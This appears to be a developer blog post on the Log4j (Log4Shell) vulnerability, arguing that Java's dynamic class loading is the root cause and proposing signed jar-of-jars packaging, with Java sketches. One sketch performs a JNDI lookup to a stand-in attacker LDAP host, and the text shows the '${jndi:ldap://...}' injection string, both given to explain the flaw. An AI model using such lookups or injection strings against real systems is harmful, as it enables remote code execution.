Since last week, everyone in the Java developer community has been stumbling over themselves because of the Log4j vulnerability. Once word got out, the log4j maintainers quickly released a fix, so if you were fairly up to date, all you had to do was upgrade a dependency and redeploy. (My project was still using log4j 1.x, so it took just a tad more effort, but that is on me.) Unless, of course, you were one of the people actually using the functionality abused by the exploit, but I wager the chances of that are small.
What I have been pondering is whether the root cause of the vulnerability really is a log4j issue at all. Yes, log4j made it easily accessible, but at the core lies the fact that the JRE is built entirely around dynamically loading executable code. It does so via the JNDI mechanism used in the log4j exploit, but also simply because every Java application loads its classes from the file system at runtime. This effectively moves all security constraints onto the system the application runs on.
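To make that concrete: the exploit ultimately boils down to getting the JRE to perform a lookup along these lines (a minimal sketch with a placeholder URL; note that recent JREs no longer trust remote codebases by default):

```java
import javax.naming.InitialContext;

// Minimal sketch of the JNDI lookup at the heart of the exploit.
// The URL is a placeholder. On older, unpatched JREs a lookup like
// this could cause a remote class to be downloaded and instantiated.
public class JndiSketch {
    public static void main(String[] args) throws Exception {
        Object obj = new InitialContext().lookup("ldap://attacker.example/exploit");
        System.out.println(obj);
    }
}
```

In the log4j case, an attacker only had to get a string like `${jndi:ldap://...}` into a logged message to trigger such a lookup.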
Java is a -let’s call it- ‘mature’ platform, and about a decade ago it seemed like a good idea to be able to load code dynamically from external locations. And when disk space was at a premium, it also was a good idea to have shared libraries present only once. But nowadays disk space is cheap and security is much more of a concern, so it is important to minimize the vectors through which malicious software can enter the system. One way to do that is to make sure that what you create at build time can’t be tampered with: no dynamic loading, but everything in one signed file at build time. Just like modern web development does with tools like webpack.
Java already has the concept of signed jars. Fat/uber jars have also existed for a long time, where all class and resource files are merged into a single jar; the Maven assembly or shade plugins can be used to create them. But fat/uber jars have a few drawbacks, most notably that if any of the merged jars contain files with the same name (I’m looking at you, MANIFEST.MF), they will overwrite each other and only one will remain. That can cause many problems, and merging those files properly is not an easy feat.
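As a sketch of why that is (illustrative code, not the actual plugin logic): a jar cannot contain two entries with the same name, so a naive merge has to silently drop or overwrite duplicates.

```java
import java.io.*;
import java.util.*;
import java.util.jar.*;

// Illustrative sketch of naive fat-jar merging: every entry of every
// dependency jar is copied into one output jar. Duplicate entry names
// (e.g. META-INF/MANIFEST.MF) must be skipped, so only the first
// occurrence survives: exactly the overwrite problem described above.
public class FatJarSketch {
    public static void main(String[] args) throws IOException {
        Set<String> seen = new HashSet<>();
        try (JarOutputStream out = new JarOutputStream(new FileOutputStream("fat.jar"))) {
            for (String arg : args) { // each argument is a dependency jar
                try (JarFile jar = new JarFile(arg)) {
                    for (JarEntry entry : Collections.list(jar.entries())) {
                        if (!seen.add(entry.getName())) {
                            continue; // duplicate: silently dropped
                        }
                        out.putNextEntry(new JarEntry(entry.getName()));
                        try (InputStream in = jar.getInputStream(entry)) {
                            in.transferTo(out);
                        }
                        out.closeEntry();
                    }
                }
            }
        }
    }
}
```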
The better alternative would be to not unpack the jars, but simply collect them all into a new jar: a jar-of-jars. Nothing is unpacked or overwritten. When starting such a jar-of-jars, the classloaders can -and should- load only from this jar. Everything you need, wrapped into an easily distributable package. Put a bow on it (sign it) and you’re all done.
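Building such a jar-of-jars is, by contrast, trivial; a minimal sketch (names are illustrative):

```java
import java.io.*;
import java.nio.file.*;
import java.util.jar.*;

// Sketch of the jar-of-jars alternative: each dependency jar is stored
// unmodified as a single entry, so nothing is unpacked and nothing collides.
public class JarOfJarsSketch {
    public static void main(String[] args) throws IOException {
        try (JarOutputStream out = new JarOutputStream(new FileOutputStream("app-all.jar"))) {
            for (String arg : args) { // each argument is a dependency jar
                out.putNextEntry(new JarEntry("lib/" + Path.of(arg).getFileName()));
                Files.copy(Path.of(arg), out);
                out.closeEntry();
            }
        }
    }
}
```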
Of course there already are options like GraalVM, but those put limitations on the Java code. A jar-of-jars only puts some restrictions on the classloader, not on the coder. Naturally a temp folder is still needed, so things like web applications can still do their code generation logic, but the JRE could provide for that by presenting an encrypted tmp folder. Maybe containers could be used to achieve something similar, but that quickly makes the solution complex.
I’ve tried writing such a jar-of-jars myself, but the fact that the Java classloader cannot load from a jar inside another jar kinda ruins the idea. My “appjar” Maven plugin therefore creates a jar-of-jars with a small embedded Java class that, upon start, unpacks the jar-of-jars into a temp directory and then spawns a new JRE. The bootstrap JRE stays behind, waiting for the spawned JRE to stop, so it can delete the temp directory.
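A rough sketch of what that embedded bootstrap class does (class and main-class names are illustrative, not the actual appjar code):

```java
import java.io.*;
import java.nio.file.*;
import java.util.*;
import java.util.jar.*;

// Illustrative bootstrap for a jar-of-jars: unpack the nested jars into
// a temp directory, spawn a second JRE on that classpath, wait for it
// to finish, then delete the temp directory again.
public class Bootstrap {
    public static void main(String[] args) throws Exception {
        Path tempDir = Files.createTempDirectory("appjar");
        List<String> classpath = new ArrayList<>();

        // The outer jar is the one this class itself was loaded from.
        Path self = Path.of(Bootstrap.class.getProtectionDomain()
                .getCodeSource().getLocation().toURI());
        try (JarFile outer = new JarFile(self.toFile())) {
            for (JarEntry entry : Collections.list(outer.entries())) {
                if (!entry.getName().endsWith(".jar")) continue;
                Path target = tempDir.resolve(Path.of(entry.getName()).getFileName());
                try (InputStream in = outer.getInputStream(entry)) {
                    Files.copy(in, target);
                }
                classpath.add(target.toString());
            }
        }

        // Spawn the real application in a fresh JRE.
        List<String> cmd = new ArrayList<>(List.of(
                System.getProperty("java.home") + "/bin/java",
                "-cp", String.join(File.pathSeparator, classpath),
                "com.example.Main")); // hypothetical application main class
        cmd.addAll(List.of(args));
        int exit = new ProcessBuilder(cmd).inheritIO().start().waitFor();

        // The bootstrap JRE stayed behind just for this cleanup step.
        try (var paths = Files.walk(tempDir)) {
            paths.sorted(Comparator.reverseOrder()).map(Path::toFile).forEach(File::delete);
        }
        System.exit(exit);
    }
}
```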
The appjar works fairly well, but it would be much better to have formal support for a jar-of-jars in the JRE.